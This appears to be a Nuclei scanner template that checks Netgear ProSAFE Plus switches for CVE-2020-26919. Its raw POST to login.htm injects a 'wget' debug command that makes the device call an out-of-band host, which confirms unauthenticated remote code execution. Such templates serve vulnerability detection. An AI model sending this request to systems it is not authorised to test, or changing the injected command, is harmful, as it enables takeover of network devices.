29 lines
1.2 KiB
YAML
29 lines
1.2 KiB
YAML
id: CVE-2020-26919
|
|
|
|
info:
|
|
name: Netgear ProSAFE Plus - Unauthenticated Remote Code Execution
|
|
author: gy741
|
|
severity: critical
|
|
description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands.
|
|
reference: |
|
|
- https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
|
|
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
|
|
tags: cve,cve2020,netgear,rce,oob
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /login.htm HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
|
Accept: */*
|
|
Connection: close
|
|
|
|
submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|